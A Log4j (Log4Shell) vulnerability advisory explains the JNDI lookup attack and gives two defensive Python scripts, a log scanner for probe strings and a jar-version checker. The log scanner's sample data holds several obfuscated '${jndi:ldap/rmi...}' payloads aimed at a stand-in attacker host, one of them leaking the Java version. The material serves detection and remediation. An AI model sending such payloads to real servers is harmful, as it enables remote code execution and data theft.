
New Vulnerability Summary - Apache Log4j

December 12, 2021

A vulnerability in the Log4j 2 logging library allows an unauthenticated attacker to execute arbitrary code and take complete control of a target system. The attacker only needs to get a specially crafted string logged by an application that uses a vulnerable version of the library: Log4j's message lookup feature then makes an outbound JNDI request (typically over LDAP or RMI) to a server the attacker controls and loads the code it returns. Any application that uses Log4j 2 is potentially affected.

&Partners is aware of the vulnerability. We are actively working with partners and vendors to mitigate potential exploits.

Log4j is an open-source Java logging library developed by the Apache Software Foundation. It is widely used directly and, more often, pulled in as a transitive dependency, which is why it appears in enterprise applications, in custom applications developed within an organisation and in numerous cloud services, frequently without the operator being aware that it is there.

The Log4j library is frequently used in enterprise Java software and is included in Apache projects such as Apache Struts2, Apache Solr, Apache Druid, Apache Flink and Apache Swift. Other large projects, including Netty, MyBatis and the Spring Framework, can also use it as their logging backend.

An application is vulnerable if attacker-controlled data reaches a log statement on a vulnerable version of Log4j 2. The data does not have to be a form field: HTTP headers such as User-Agent, usernames, e-mail subjects and any other value an application routinely logs are sufficient, and the logging may happen in a backend service several hops away from the one the attacker talks to directly.
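Because the trigger is simply a `${jndi:...}` lookup string arriving in a logged value, the first thing most teams did was search their web server and application logs for it. The script below is an added example, not code from the original advisory: it flags lines carrying such a lookup and first resolves the `${lower:...}`, `${upper:...}` and `${key:-default}` lookups that attackers nest to spell "jndi" without writing it literally. The log lines in `SAMPLE_LOG` are constructed for illustration and use documentation IP ranges.

```python
"""Spot Log4Shell probe strings in web server or application logs.

Added example, not code from the original advisory. Log4j 2 expands
${name:...} lookups inside logged messages; a ${jndi:...} lookup is the
trigger for this vulnerability. Attackers hide the word "jndi" behind
nested lookups such as ${lower:j} or ${::-j}, so the detector resolves
those before matching. The log lines below are constructed samples.
"""
import re
from typing import List, Tuple

# ${lower:X} / ${upper:X} with no further nesting inside X
_CASE = re.compile(r"\$\{\s*(lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
# ${anything:-X}: attackers use an undefined key so the default X is returned
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

# Constructed sample log lines (combined log format, User-Agent last).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:09 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}${lower:n}${lower:d}${lower:i}:${lower:rmi}://198.51.100.23:1099/obj}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:11 +0000] "GET /api HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.23/x}"',
    '10.0.0.9 - - [12/Dec/2021:10:01:13 +0000] "GET /api HTTP/1.1" 200 512 "-" "${jndi:ldap://${sys:java.version}.c2.example.com/a}"',
    '10.0.0.7 - - [12/Dec/2021:10:01:15 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.68"',
]


def normalize(s: str) -> str:
    """Resolve case and default lookups from the inside out until stable."""
    prev = None
    while prev != s:
        prev = s
        s = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s


def _extract_lookup(s: str, start: int) -> str:
    """Return the ${...} lookup starting at s[start], honouring nested braces
    (exfiltration payloads embed ${sys:...} or ${env:...} inside the URL)."""
    depth = 0
    i = start
    while i < len(s):
        if s.startswith("${", i):
            depth += 1
            i += 2
            continue
        if s[i] == "}":
            depth -= 1
            if depth == 0:
                return s[start:i + 1]
        i += 1
    return s[start:]  # unterminated lookup: report what is there


def find_jndi(line: str) -> List[str]:
    """Return every de-obfuscated ${jndi:...} lookup found in one line."""
    text = normalize(line)
    return [_extract_lookup(text, m.start()) for m in _JNDI.finditer(text)]


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, payload) for each hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        for payload in find_jndi(line):
            hits.append((n, payload))
    return hits


if __name__ == "__main__":
    for n, payload in scan(SAMPLE_LOG):
        print(f"line {n}: {payload}")
```

Line 6 of the sample shows why matching on `${` alone is too noisy: `${date:yyyy}` is a legitimate lookup and is not reported. The normaliser only covers the obfuscations seen most often in the wild; a hit tells you someone is probing, while the absence of a hit in a particular log file says nothing about services further back in the request path that may have logged the same header.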

Version 1 of Log4j is end of life, is no longer maintained and has its own unpatched security vulnerabilities. Developers should migrate to the latest release of Log4j 2 (currently Log4j 2.17.0). Where a dependency cannot be upgraded immediately, removing the JndiLookup class from the log4j-core jar is the documented stop-gap, but it is not a substitute for the upgrade.
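Knowing which version you are running is harder than it sounds, because log4j-core is usually buried inside a Spring Boot fat jar, a WAR or an EAR rather than sitting on the classpath as a plain file. The script below is an added example, not code from the original advisory or from Apache: it walks a directory, descends into nested archives, reads the Maven pom.properties that log4j-core ships inside the jar, and reports whether JndiLookup.class is still present. The archives built by `build_samples()` are constructed in memory so the example runs offline; `TARGET` is the 2.17.0 release the advisory names.

```python
"""Find Log4j 2 core jars, including ones nested in fat jars, WARs and
EARs, and report version and whether JndiLookup.class is still present.

Added example, not code from the original advisory or from Apache.
The sample archives in build_samples() are constructed for illustration.
"""
import io
import os
import re
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
TARGET = (2, 17, 0)  # release the advisory asks developers to move to
NESTED = (".jar", ".war", ".ear", ".zip")


def parse_version(v: Optional[str]) -> Optional[Tuple[int, ...]]:
    """'2.14.1' -> (2, 14, 1); None or unparsable -> None."""
    if not v:
        return None
    nums = re.findall(r"\d+", v)
    return tuple(int(n) for n in nums[:3]) if nums else None


@dataclass
class Finding:
    path: str                 # nested archives are joined with "!/"
    version: Optional[str]    # None if pom.properties is missing
    jndi_lookup_present: bool

    def status(self) -> str:
        v = parse_version(self.version)
        if v is not None and v >= TARGET:
            return "ok"
        if self.jndi_lookup_present:
            return "vulnerable: upgrade"
        return "mitigated by class removal: upgrade anyway"


def inspect_archive(data: bytes, path: str, out: List[Finding]) -> None:
    """Record log4j-core evidence in this archive, then recurse into nested ones."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return  # named like an archive but is not one
    with zf:
        names = set(zf.namelist())
        if POM_PROPS in names or JNDI_LOOKUP in names:
            version = None
            if POM_PROPS in names:
                text = zf.read(POM_PROPS).decode("utf-8", "replace")
                m = re.search(r"^version=(\S+)", text, re.MULTILINE)
                version = m.group(1) if m else None
            out.append(Finding(path, version, JNDI_LOOKUP in names))
        for name in sorted(names):
            if name.lower().endswith(NESTED):
                inspect_archive(zf.read(name), f"{path}!/{name}", out)


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory on disk and inspect every archive found."""
    out: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(NESTED):
                p = os.path.join(dirpath, f)
                with open(p, "rb") as fh:
                    inspect_archive(fh.read(), p, out)
    return out


def _jar(entries: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_samples() -> dict:
    """Constructed archives: a vulnerable core jar nested Spring Boot style
    inside app.jar, a jar with the class removed, and a 2.17.0 jar."""
    def core(version: str, with_class: bool = True) -> bytes:
        e = {POM_PROPS: f"version={version}\n".encode()}
        if with_class:
            e[JNDI_LOOKUP] = b"\xca\xfe\xba\xbe"  # class-file magic as placeholder body
        return _jar(e)
    return {
        "app.jar": _jar({"BOOT-INF/lib/log4j-core-2.14.1.jar": core("2.14.1")}),
        "stripped.jar": core("2.14.1", with_class=False),
        "log4j-core-2.17.0.jar": core("2.17.0"),
    }


def scan_samples() -> List[Tuple[str, Optional[str], str]]:
    out: List[Finding] = []
    for name, data in build_samples().items():
        inspect_archive(data, name, out)
    return [(f.path, f.version, f.status()) for f in out]


if __name__ == "__main__":
    for path, version, status in scan_samples():
        print(f"{path}: {version} -> {status}")
```

Run `scan_tree("/opt/app")` (or the root of your deployment) against real hosts. Two caveats: the comparison is purely numeric against 2.17.0, so the fixed releases Apache published on the Java 7 (2.12.x) and Java 6 (2.3.x) branches will be reported as needing action, which is conservative rather than wrong; and a build that shades log4j-core with package relocation changes the class path, so a copy renamed that way is only found by searching for the pom.properties file, not for `JndiLookup.class`.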
